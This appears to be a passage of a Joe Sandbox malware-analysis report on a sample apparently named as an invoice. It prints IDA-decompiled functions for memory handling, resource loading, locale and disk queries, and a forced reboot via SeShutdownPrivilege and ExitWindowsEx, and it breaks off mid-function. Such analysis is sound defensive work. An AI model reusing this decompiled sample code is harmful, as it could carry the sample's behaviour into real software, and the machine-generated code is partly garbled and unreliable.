    • Associated: 00000002.00000001.12809054234.00412000.00000004.sdmp
    • Associated: 00000002.00000001.12809193738.00417000.00000004.sdmp
    • Associated: 00000002.00000001.12809202686.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_1_400000_facture_1398665.jbxd
    C-Code - Quality: 100%
    			E00406458() {
    				intOrPtr _v16;
    				struct _SYSTEM_INFO* _t3;
    
    				GetSystemInfo(_t3); // executed
    				return _v16;
    			}





    0x0040645c
    0x00406468

    APIs
    Memory Dump Source
    • Source File: 00000002.00000001.12808788925.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000001.12808757994.00400000.00000002.sdmp
    • Associated: 00000002.00000001.12809054234.00412000.00000004.sdmp
    • Associated: 00000002.00000001.12809193738.00417000.00000004.sdmp
    • Associated: 00000002.00000001.12809202686.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_1_400000_facture_1398665.jbxd
    C-Code - Quality: 100%
    			E0040ACFB() {
    				int _t3;
    				void* _t4;
    
    				_t3 = SetErrorMode( *(_t4 - 0xc)); // executed
    				return _t3;
    			}





    0x0040acf0
    0x0040acf5

    APIs
    • SetErrorMode.KERNEL32(?,0040ACFD), ref: 0040ACF0
    Memory Dump Source
    • Source File: 00000002.00000001.12808788925.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000001.12808757994.00400000.00000002.sdmp
    • Associated: 00000002.00000001.12809054234.00412000.00000004.sdmp
    • Associated: 00000002.00000001.12809193738.00417000.00000004.sdmp
    • Associated: 00000002.00000001.12809202686.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_1_400000_facture_1398665.jbxd
    C-Code - Quality: 100%
    			E0040CE24(void* __eax, void* __fp0) {
    				char _v16;
    				char _v20;
    				void* _v28;
    				void* _t29;
    				void* _t32;
    				void* _t40;
    				void* _t50;
    				long _t52;
    
    				_t40 = __eax;
    				if( *((intOrPtr*)(__eax + 8))() != 5) {
    					E0040CC3C(1);
    				}
    				E00403250(_t40 + 0x14, 0x50);
    				if(E0040D9D8(_t40 + 0x14, 0x50,  &_v16,  &_v20, 5) != 0) {
    					E0040CC3C(3);
    				}
    				if(_v16 > 0x4000000) {
    					E0040CC3C(7);
    				}
    				_t52 = _v20 + _v16;
    				if(_t52 !=  *(_t40 + 0x68)) {
    					E0040CDCC(_t40);
    					_t32 = VirtualAlloc(0, _t52, 0x1000, 4); // executed
    					_t50 = _t32;
    					 *(_t40 + 0x64) = _t50;
    					if(_t50 == 0) {
    						E00409818();
    					}
    					 *(_t40 + 0x68) = _t52;
    				}
    				_t29 = E0040DA28(_t40 + 0x14,  *(_t40 + 0x64) + _v20,  *(_t40 + 0x64));
    				 *((char*)(_t40 + 0x11)) = 1;
    				return _t29;
    			}











    0x0040ce2a
    0x0040ce3c
    0x0040ce43
    0x0040ce43
    0x0040ce52
    0x0040ce76
    0x0040ce7d
    0x0040ce7d
    0x0040ce8a
    0x0040ce91
    0x0040ce91
    0x0040ce9a
    0x0040cea1
    0x0040cea5
    0x0040ceb4
    0x0040ceb9
    0x0040cebb
    0x0040cec0
    0x0040cec2
    0x0040cec2
    0x0040cec7
    0x0040cec7
    0x0040ced7
    0x0040cedc
    0x0040cee6

    APIs
      • Part of subcall function 0040CDCC: VirtualFree.KERNEL32(?,00000000,00008000,?,0040CDB2), ref: 0040CDE3
    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0040CEB4
    Memory Dump Source
    • Source File: 00000002.00000001.12808788925.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000001.12808757994.00400000.00000002.sdmp
    • Associated: 00000002.00000001.12809054234.00412000.00000004.sdmp
    • Associated: 00000002.00000001.12809193738.00417000.00000004.sdmp
    • Associated: 00000002.00000001.12809202686.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_1_400000_facture_1398665.jbxd
    C-Code - Quality: 96%
    			E00401706(void* __eax) {
    				struct _MEMORY_BASIC_INFORMATION _v44;
    				void* _v48;
    				void* _t13;
    				int _t20;
    				void* _t22;
    				signed int _t26;
    				signed int _t29;
    				signed int _t30;
    				void* _t34;
    				intOrPtr _t35;
    				signed int _t39;
    				void* _t41;
    				void* _t42;
    
    				_push(_t29);
    				_t42 = _t41 + 0xffffffdc;
    				_t34 = __eax - 0x10;
    				E0040165C();
    				_t13 = _t34;
    				 *_t42 =  *_t13;
    				_v48 =  *((intOrPtr*)(_t13 + 4));
    				_t26 =  *(_t13 + 0xc);
    				if((_t26 & 0x00000008) != 0) {
    					_t22 = _t34;
    					_t39 = _t26 & 0xfffffff0;
    					_t30 = 0;
    					while(1) {
    						VirtualQuery(_t22,  &_v44, 0x1c);
    						if(VirtualFree(_t22, 0, 0x8000) == 0) {
    							break;
    						}
    						_t35 = _v44.RegionSize;
    						if(_t39 > _t35) {
    							_t39 = _t39 - _t35;
    							_t22 = _t22 + _t35;
    							continue;
    						}
    						goto L10;
    					}
    					_t30 = _t30 | 0xffffffff;
    				} else {
    					_t20 = VirtualFree(_t34, 0, 0x8000); // executed
    					if(_t20 == 0) {
    						_t30 = _t29 | 0xffffffff;
    					} else {
    						_t30 = 0;
    					}
    				}
    				L10:
    				if(_t30 == 0) {
    					 *_v48 =  *_t42;
    					 *( *_t42 + 4) = _v48;
    				}
    				 *0x415ac4 = 0;
    				return _t30;
    			}
















    0x0040170a
    0x0040170c
    0x00401711
    0x00401714
    0x00401719
    0x0040171d
    0x00401723
    0x00401727
    0x0040172d
    0x00401749
    0x0040174d
    0x00401750
    0x00401752
    0x0040175a
    0x0040176e
    0x00000000
    0x00000000
    0x00401775
    0x0040177b
    0x0040177d
    0x0040177f
    0x00000000
    0x0040177f
    0x00000000
    0x0040177b
    0x00401770
    0x0040172f
    0x00401737
    0x0040173e
    0x00401744
    0x00401740
    0x00401740
    0x00401740
    0x0040173e
    0x00401783
    0x00401785
    0x0040178e
    0x00401797
    0x00401797
    0x0040179a
    0x004017aa

    APIs
      • Part of subcall function 0040165C: Sleep.KERNEL32(00000000,004016DF,00000000,?,00101000,00000004), ref: 00401672
      • Part of subcall function 0040165C: Sleep.KERNEL32(0000000A,00000000,004016DF,00000000,?,00101000,00000004), ref: 0040168B
    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00401737
    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040175A
    • VirtualFree.KERNEL32(?,00000000,00008000,?,?,0000001C), ref: 00401767
    Memory Dump Source
    • Source File: 00000002.00000001.12808788925.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000001.12808757994.00400000.00000002.sdmp
    • Associated: 00000002.00000001.12809054234.00412000.00000004.sdmp
    • Associated: 00000002.00000001.12809193738.00417000.00000004.sdmp
    • Associated: 00000002.00000001.12809202686.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_1_400000_facture_1398665.jbxd
    C-Code - Quality: 100%
    			E004015E4(signed int __eax) {
    				void* _t4;
    				intOrPtr _t7;
    				signed int _t8;
    				void* _t10;
    				void** _t15;
    				void* _t17;
    
    				_t8 = __eax;
    				E00401578(__eax);
    				_t4 = VirtualAlloc(0, 0x13fff0, 0x1000, 4); // executed
    				if(_t4 == 0) {
    					 *0x413a3c = 0;
    					return 0;
    				} else {
    					_t15 =  *0x413a28; // 0x1150000
    					_t10 = _t4;
    					 *_t10 = 0x413a24;
    					 *0x413a28 = _t4;
    					 *(_t10 + 4) = _t15;
    					 *_t15 = _t4;
    					_t17 = _t4 + 0x13fff0;
    					 *((intOrPtr*)(_t17 - 4)) = 2;
    					 *0x413a3c = 0x13ffe0 - _t8;
    					_t7 = _t17 - _t8;
    					 *0x413a38 = _t7;
    					 *(_t7 - 4) = _t8 | 0x00000002;
    					return _t7;
    				}
    			}









    0x004015e5
    0x004015e7
    0x004015fa
    0x00401601
    0x00401652
    0x0040165a
    0x00401603
    0x00401603
    0x00401609
    0x0040160b
    0x00401611
    0x00401616
    0x00401619
    0x0040161d
    0x00401628
    0x00401635
    0x0040163d
    0x0040163f
    0x0040164c
    0x0040164f
    0x0040164f

    APIs
    • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,00401BF3), ref: 004015FA
    Memory Dump Source
    • Source File: 00000002.00000001.12808788925.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000001.12808757994.00400000.00000002.sdmp
    • Associated: 00000002.00000001.12809054234.00412000.00000004.sdmp
    • Associated: 00000002.00000001.12809193738.00417000.00000004.sdmp
    • Associated: 00000002.00000001.12809202686.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_1_400000_facture_1398665.jbxd
    C-Code - Quality: 100%
    			E0040CDCC(void* __eax) {
    				void* _t6;
    				void* _t9;
    
    				_t9 = __eax;
    				 *((intOrPtr*)(__eax + 0x68)) = 0;
    				_t6 =  *(__eax + 0x64);
    				if(_t6 != 0) {
    					VirtualFree(_t6, 0, 0x8000); // executed
    					 *((intOrPtr*)(_t9 + 0x64)) = 0;
    					return 0;
    				}
    				return _t6;
    			}





    0x0040cdcd
    0x0040cdd1
    0x0040cdd4
    0x0040cdd9
    0x0040cde3
    0x0040cdea
    0x00000000
    0x0040cdea
    0x0040cdee

    APIs
    • VirtualFree.KERNEL32(?,00000000,00008000,?,0040CDB2), ref: 0040CDE3
    Memory Dump Source
    • Source File: 00000002.00000001.12808788925.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000001.12808757994.00400000.00000002.sdmp
    • Associated: 00000002.00000001.12809054234.00412000.00000004.sdmp
    • Associated: 00000002.00000001.12809193738.00417000.00000004.sdmp
    • Associated: 00000002.00000001.12809202686.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_1_400000_facture_1398665.jbxd

    Non-executed Functions

    C-Code - Quality: 78%
    			E00405BEC(WCHAR* __eax, int __edx) {
    				WCHAR* _v8;
    				int _v12;
    				WCHAR* _v16;
    				void* _v20;
    				struct _WIN32_FIND_DATAW _v612;
    				short _v1134;
    				signed int _t53;
    				signed int _t54;
    				signed int _t59;
    				signed int _t60;
    				signed int _t105;
    				signed int _t106;
    				intOrPtr* _t107;
    				WCHAR* _t114;
    				WCHAR* _t116;
    				short* _t117;
    				void* _t118;
    
    				_v12 = __edx;
    				_v8 = __eax;
    				_v16 = _v8;
    				_v20 = GetModuleHandleW(L"kernel32.dll");
    				if(_v20 == 0) {
    					L4:
    					if( *_v8 != 0x5c) {
    						_t116 =  &(_v8[2]);
    						goto L10;
    					} else {
    						if(_v8[1] == 0x5c) {
    							_t117 = E00405BC8( &(_v8[2]));
    							if( *_t117 != 0) {
    								_t17 = _t117 + 2; // 0x2
    								_t116 = E00405BC8(_t17);
    								if( *_t116 != 0) {
    									L10:
    									_t105 = _t116 - _v8;
    									_t106 = _t105 >> 1;
    									if(_t105 < 0) {
    										asm("adc ebx, 0x0");
    									}
    									lstrcpynW( &_v1134, _v8, _t106 + 1);
    									while( *_t116 != 0) {
    										_t114 = E00405BC8( &(_t116[1]));
    										_t53 = _t114 - _t116;
    										_t54 = _t53 >> 1;
    										if(_t53 < 0) {
    											asm("adc eax, 0x0");
    										}
    										if(_t54 + _t106 + 1 <= 0x105) {
    											_t59 = _t114 - _t116;
    											_t60 = _t59 >> 1;
    											if(_t59 < 0) {
    												asm("adc eax, 0x0");
    											}
    											lstrcpynW( &_v1134 + _t106 + _t106, _t116, _t60 + 1);
    											_v20 = FindFirstFileW( &_v1134,  &_v612);
    											if(_v20 != 0xffffffff) {
    												FindClose(_v20);
    												if(lstrlenW( &(_v612.cFileName)) + _t106 + 1 + 1 <= 0x105) {
    													 *((short*)(_t118 + _t106 * 2 - 0x46a)) = 0x5c;
    													lstrcpynW( &(( &_v1134 + _t106 + _t106)[1]),  &(_v612.cFileName), 0x105 - _t106 - 1);
    													_t106 = _t106 + lstrlenW( &(_v612.cFileName)) + 1;
    													_t116 = _t114;
    													continue;
    												}
    											}
    										}
    										goto L23;
    									}
    									lstrcpynW(_v8,  &_v1134, _v12);
    								}
    							}
    						}
    					}
    				} else {
    					_t107 = GetProcAddress(_v20, "GetLongPathNameW");
    					if(_t107 == 0) {
    						goto L4;
    					} else {
    						_push(0x105);
    						_push( &_v1134);
    						_push(_v8);
    						if( *_t107() == 0) {
    							goto L4;
    						} else {
    							lstrcpynW(_v8,  &_v1134, _v12);
    						}
    					}
    				}
    				L23:
    				return _v16;
    			}




















    0x00405bf8
    0x00405bfb
    0x00405c01
    0x00405c0e
    0x00405c15
    0x00405c5a
    0x00405c61
    0x00405ca1
    0x00000000
    0x00405c63
    0x00405c6b
    0x00405c7c
    0x00405c82
    0x00405c88
    0x00405c90
    0x00405c96
    0x00405ca4
    0x00405ca6
    0x00405ca9
    0x00405cab
    0x00405cad
    0x00405cad
    0x00405cbf
    0x00405d8e
    0x00405cd1
    0x00405cd5
    0x00405cd7
    0x00405cd9
    0x00405cdb
    0x00405cdb
    0x00405ce6
    0x00405cee
    0x00405cf0
    0x00405cf2
    0x00405cf4
    0x00405cf4
    0x00405d07
    0x00405d1f
    0x00405d26
    0x00405d30
    0x00405d4c
    0x00405d4e
    0x00405d78
    0x00405d8a
    0x00405d8c
    0x00000000
    0x00405d8c
    0x00405d4c
    0x00405d26
    0x00000000
    0x00405ce6
    0x00405da7
    0x00405da7
    0x00405c96
    0x00405c82
    0x00405c6b
    0x00405c17
    0x00405c25
    0x00405c29
    0x00000000
    0x00405c2b
    0x00405c2b
    0x00405c36
    0x00405c3a
    0x00405c3f
    0x00000000
    0x00405c41
    0x00405c50
    0x00405c50
    0x00405c3f
    0x00405c29
    0x00405dac
    0x00405db5

    APIs
    • GetModuleHandleW.KERNEL32(kernel32.dll,00407574,?,00000000), ref: 00405C09
    • GetProcAddress.KERNEL32(?,GetLongPathNameW,kernel32.dll,00407574,?,00000000), ref: 00405C20
    • lstrcpynW.KERNEL32(?,?,?), ref: 00405C50
    • lstrcpynW.KERNEL32(?,?,?,kernel32.dll,00407574,?,00000000), ref: 00405CBF
      • Part of subcall function 00405BC8: CharNextW.USER32(?), ref: 00405BCF
    • lstrcpynW.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,00407574,?,00000000), ref: 00405D07
    • FindFirstFileW.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,00407574,?,00000000), ref: 00405D1A
    • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,00407574,?,00000000), ref: 00405D30
    • lstrlenW.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,00407574,?,00000000), ref: 00405D3C
    • lstrcpynW.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,00407574,?), ref: 00405D78
    • lstrlenW.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,00407574), ref: 00405D84
    • lstrcpynW.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 00405DA7
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12842280383.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.12842260256.00400000.00000002.sdmp
    • Associated: 00000002.00000002.12842384840.00412000.00000004.sdmp
    • Associated: 00000002.00000002.12842407813.00417000.00000004.sdmp
    • Associated: 00000002.00000002.12842428355.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_facture_1398665.jbxd
    C-Code - Quality: 91%
    			E0040E538() {
    				int _v4;
    				struct _TOKEN_PRIVILEGES _v16;
    				void* _v20;
    				intOrPtr* _t6;
    				int _t7;
    
    				_t6 =  *0x412c7c; // 0x4127d8
    				if( *_t6 != 2) {
    					L5:
    					_t7 = ExitWindowsEx(2, 0);
    					asm("sbb eax, eax");
    					return _t7 + 1;
    				}
    				if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v20) != 0) {
    					LookupPrivilegeValueW(0, L"SeShutdownPrivilege",  &(_v16.Privileges));
    					_v16.PrivilegeCount = 1;
    					_v4 = 2;
    					AdjustTokenPrivileges(_v20, 0,  &_v16, 0, 0, 0);
    					if(GetLastError() == 0) {
    						goto L5;
    					}
    					return 0;
    				}
    				return 0;
    			}








    0x0040e53b
    0x0040e543
    0x0040e5a0
    0x0040e5a4
    0x0040e5ac
    0x00000000
    0x0040e5ae
    0x0040e555
    0x0040e567
    0x0040e56c
    0x0040e574
    0x0040e58e
    0x0040e59a
    0x00000000
    0x00000000
    0x00000000
    0x0040e59c
    0x00000000

    APIs
    • GetCurrentProcess.KERNEL32(00000028), ref: 0040E548
    • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040E54E
    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 0040E567
    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 0040E58E
    • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 0040E593
    • ExitWindowsEx.USER32(00000002,00000000), ref: 0040E5A4
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12842280383.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.12842260256.00400000.00000002.sdmp
    • Associated: 00000002.00000002.12842384840.00412000.00000004.sdmp
    • Associated: 00000002.00000002.12842407813.00417000.00000004.sdmp
    • Associated: 00000002.00000002.12842428355.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_facture_1398665.jbxd
    C-Code - Quality: 100%
    			E0040EE14() {
    				struct HRSRC__* _t10;
    				void* _t11;
    				void* _t12;
    
    				_t10 = FindResourceW(0, 0x2b67, 0xa);
    				if(_t10 == 0) {
    					E0040EC58();
    				}
    				if(SizeofResource(0, _t10) != 0x2c) {
    					E0040EC58();
    				}
    				_t11 = LoadResource(0, _t10);
    				if(_t11 == 0) {
    					E0040EC58();
    				}
    				_t12 = LockResource(_t11);
    				if(_t12 == 0) {
    					E0040EC58();
    				}
    				return _t12;
    			}






    0x0040ee23
    0x0040ee27
    0x0040ee29
    0x0040ee29
    0x0040ee39
    0x0040ee3b
    0x0040ee3b
    0x0040ee48
    0x0040ee4c
    0x0040ee4e
    0x0040ee4e
    0x0040ee59
    0x0040ee5d
    0x0040ee5f
    0x0040ee5f
    0x0040ee67

    APIs
    • FindResourceW.KERNEL32(00000000,00002B67,0000000A), ref: 0040EE1E
    • SizeofResource.KERNEL32(00000000,00000000,?,00411893,00000000,00411E26,?,00000001,00000000,00000002,00000000,00411E7A,?,00000000,00411EBE), ref: 0040EE31
    • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,00411893,00000000,00411E26,?,00000001,00000000,00000002,00000000,00411E7A,?,00000000), ref: 0040EE43
    • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00411893,00000000,00411E26,?,00000001,00000000,00000002,00000000,00411E7A), ref: 0040EE54
    Memory Dump Source
    • Source File: 00000002.00000002.12842280383.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.12842260256.00400000.00000002.sdmp
    • Associated: 00000002.00000002.12842384840.00412000.00000004.sdmp
    • Associated: 00000002.00000002.12842407813.00417000.00000004.sdmp
    • Associated: 00000002.00000002.12842428355.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_facture_1398665.jbxd
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12842280383.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.12842260256.00400000.00000002.sdmp
    • Associated: 00000002.00000002.12842384840.00412000.00000004.sdmp
    • Associated: 00000002.00000002.12842407813.00417000.00000004.sdmp
    • Associated: 00000002.00000002.12842428355.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_facture_1398665.jbxd
    Strings
    Memory Dump Source
    • Source File: 00000002.00000001.12808788925.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000001.12808757994.00400000.00000002.sdmp
    • Associated: 00000002.00000001.12809054234.00412000.00000004.sdmp
    • Associated: 00000002.00000001.12809193738.00417000.00000004.sdmp
    • Associated: 00000002.00000001.12809202686.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_1_400000_facture_1398665.jbxd
    C-Code - Quality: 100%
    			E00411F58() {
    				intOrPtr* _t1;
    
    				 *((intOrPtr*)(_t1 +  *_t1)) =  *((intOrPtr*)(_t1 +  *_t1)) + _t2;
    			}




    0x00411f5a

    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12842280383.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.12842260256.00400000.00000002.sdmp
    • Associated: 00000002.00000002.12842384840.00412000.00000004.sdmp
    • Associated: 00000002.00000002.12842407813.00417000.00000004.sdmp
    • Associated: 00000002.00000002.12842428355.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_facture_1398665.jbxd
    C-Code - Quality: 100%
    			E00411F58() {
    				intOrPtr* _t1;
    
    				 *((intOrPtr*)(_t1 +  *_t1)) =  *((intOrPtr*)(_t1 +  *_t1)) + _t2;
    			}




    0x00411f5a

    Strings
    Memory Dump Source
    • Source File: 00000002.00000001.12808788925.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000001.12808757994.00400000.00000002.sdmp
    • Associated: 00000002.00000001.12809054234.00412000.00000004.sdmp
    • Associated: 00000002.00000001.12809193738.00417000.00000004.sdmp
    • Associated: 00000002.00000001.12809202686.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_1_400000_facture_1398665.jbxd
    C-Code - Quality: 94%
    			E0040805C(intOrPtr* __eax, void* __ebx, intOrPtr* __edx, WCHAR* _a8, intOrPtr* _a12) {
    				long _v8;
    				long _v12;
    				long _v16;
    				long _v20;
    				short _v24;
    				signed int _v28;
    				intOrPtr _v117;
    				intOrPtr* _t28;
    				WCHAR* _t29;
    				int _t30;
    				short _t35;
    				intOrPtr _t38;
    				WCHAR* _t43;
    				intOrPtr* _t44;
    				short _t53;
    				short _t55;
    
    				_t28 = __eax +  *__eax;
    				 *_t28 =  *_t28 + _t28;
    				 *__edx =  *__edx + __ebx;
    				 *_t28 =  *_t28 + _t28;
    				 *_t28 =  *_t28 + _t28;
    				_v117 = _v117 + __edx;
    				_push(__ebx);
    				_t29 = _a8;
    				if(_t29 == 0) {
    					_t29 = 0;
    				}
    				_t30 = GetDiskFreeSpaceW(_t29,  &_v8,  &_v12,  &_v16,  &_v20);
    				_v28 = _v8 * _v12;
    				_v24 = 0;
    				_t53 = _v24;
    				_t35 = E004058EC(_v28, _t53, _v16, 0);
    				_t43 = _a8;
    				 *_t43 = _t35;
    				_t43[2] = _t53;
    				_t55 = _v24;
    				_t38 = E004058EC(_v28, _t55, _v20, 0);
    				_t44 = _a12;
    				 *_t44 = _t38;
    				 *(_t44 + 4) = _t55;
    				return _t30;
    			}



















    0x0040805c
    0x0040805e
    0x00408061
    0x00408063
    0x00408065
    0x00408067
    0x0040806e
    0x0040806f
    0x00408074
    0x00408076
    0x00408076
    0x00408089
    0x00408098
    0x0040809b
    0x004080a8
    0x004080ab
    0x004080b0
    0x004080b3
    0x004080b5
    0x004080c2
    0x004080c5
    0x004080ca
    0x004080cd
    0x004080cf
    0x004080d8

    APIs
    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?), ref: 00408089
    Memory Dump Source
    • Source File: 00000002.00000002.12842280383.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.12842260256.00400000.00000002.sdmp
    • Associated: 00000002.00000002.12842384840.00412000.00000004.sdmp
    • Associated: 00000002.00000002.12842407813.00417000.00000004.sdmp
    • Associated: 00000002.00000002.12842428355.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_facture_1398665.jbxd
    C-Code - Quality: 88%
    			E00408EB4(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
    				short _v516;
    				int _t5;
    				intOrPtr _t10;
    				void* _t18;
    
    				_t18 = __ecx;
    				_t10 = _a4;
    				_t5 = GetLocaleInfoW(__eax, __edx,  &_v516, 0x100);
    				_t19 = _t5;
    				if(_t5 <= 0) {
    					return E00404C98(_t10, _t18);
    				}
    				return E00404DD4(_t10, _t5 - 1,  &_v516, _t19);
    			}







    0x00408ebf
    0x00408ec1
    0x00408ed2
    0x00408ed7
    0x00408ed9
    0x00000000
    0x00408ef1
    0x00000000

    APIs
    • GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 00408ED2
    Memory Dump Source
    • Source File: 00000002.00000002.12842280383.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.12842260256.00400000.00000002.sdmp
    • Associated: 00000002.00000002.12842384840.00412000.00000004.sdmp
    • Associated: 00000002.00000002.12842407813.00417000.00000004.sdmp
    • Associated: 00000002.00000002.12842428355.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_facture_1398665.jbxd
    C-Code - Quality: 79%
    			E00408F00(int __eax, signed int __ecx, int __edx) {
    				short _v16;
    				signed int _t5;
    				signed int _t10;
    
    				_push(__ecx);
    				_t10 = __ecx;
    				if(GetLocaleInfoW(__eax, __edx,  &_v16, 2) <= 0) {
    					_t5 = _t10;
    				} else {
    					_t5 = _v16 & 0x0000ffff;
    				}
    				return _t5;
    			}






    0x00408f03
    0x00408f04
    0x00408f1a
    0x00408f22
    0x00408f1c
    0x00408f1c
    0x00408f1c
    0x00408f28

    APIs
    • GetLocaleInfoW.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040A65C,00000000,0040A886,?,?,00000000,00000000), ref: 00408F13
    Memory Dump Source
    • Source File: 00000002.00000002.12842280383.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.12842260256.00400000.00000002.sdmp
    • Associated: 00000002.00000002.12842384840.00412000.00000004.sdmp
    • Associated: 00000002.00000002.12842407813.00417000.00000004.sdmp
    • Associated: 00000002.00000002.12842428355.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_facture_1398665.jbxd
    C-Code - Quality: 100%
    			E0040E640(signed int __eax) {
    				short _v8;
    				signed int _t6;
    
    				_t6 = GetLocaleInfoW(__eax & 0x0000ffff, 0x20001004,  &_v8, 2);
    				if(_t6 <= 0) {
    					return _t6 | 0xffffffff;
    				}
    				return _v8;
    			}





    0x0040e656
    0x0040e65d
    0x00000000
    0x0040e664
    0x00000000

    APIs
    • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,00000000,?,?,0040E73F), ref: 0040E656
    Memory Dump Source
    • Source File: 00000002.00000002.12842280383.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.12842260256.00400000.00000002.sdmp
    • Associated: 00000002.00000002.12842384840.00412000.00000004.sdmp
    • Associated: 00000002.00000002.12842407813.00417000.00000004.sdmp
    • Associated: 00000002.00000002.12842428355.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_facture_1398665.jbxd
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12842384840.00412000.00000004.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.12842260256.00400000.00000002.sdmp
    • Associated: 00000002.00000002.12842280383.00401000.00000020.sdmp
    • Associated: 00000002.00000002.12842407813.00417000.00000004.sdmp
    • Associated: 00000002.00000002.12842428355.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_facture_1398665.jbxd
    Strings
    Memory Dump Source
    • Source File: 00000002.00000001.12809054234.00412000.00000004.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000001.12808757994.00400000.00000002.sdmp
    • Associated: 00000002.00000001.12808788925.00401000.00000020.sdmp
    • Associated: 00000002.00000001.12809193738.00417000.00000004.sdmp
    • Associated: 00000002.00000001.12809202686.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_1_400000_facture_1398665.jbxd
    C-Code - Quality: 100%
    			E0040D33C(intOrPtr* __eax, intOrPtr __ecx, intOrPtr __edx, intOrPtr* _a4, intOrPtr _a8) {
    				intOrPtr* _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				intOrPtr _v20;
    				signed int _v24;
    				char _v25;
    				signed int _v32;
    				signed int _v36;
    				signed int _v40;
    				signed int _v44;
    				signed int _v48;
    				signed int _v52;
    				signed int _v56;
    				intOrPtr _v60;
    				char _v64;
    				char* _v68;
    				void* _v72;
    				char _v76;
    				intOrPtr _v80;
    				intOrPtr _v84;
    				signed int _v88;
    				char _v89;
    				char _v96;
    				signed int _v100;
    				signed int _v104;
    				short* _v108;
    				signed int _v112;
    				signed int _v116;
    				intOrPtr _v120;
    				intOrPtr _v124;
    				intOrPtr _v128;
    				intOrPtr _v132;
    				char _v136;
    				signed int _t370;
    				void* _t375;
    				signed int _t377;
    				signed int _t381;
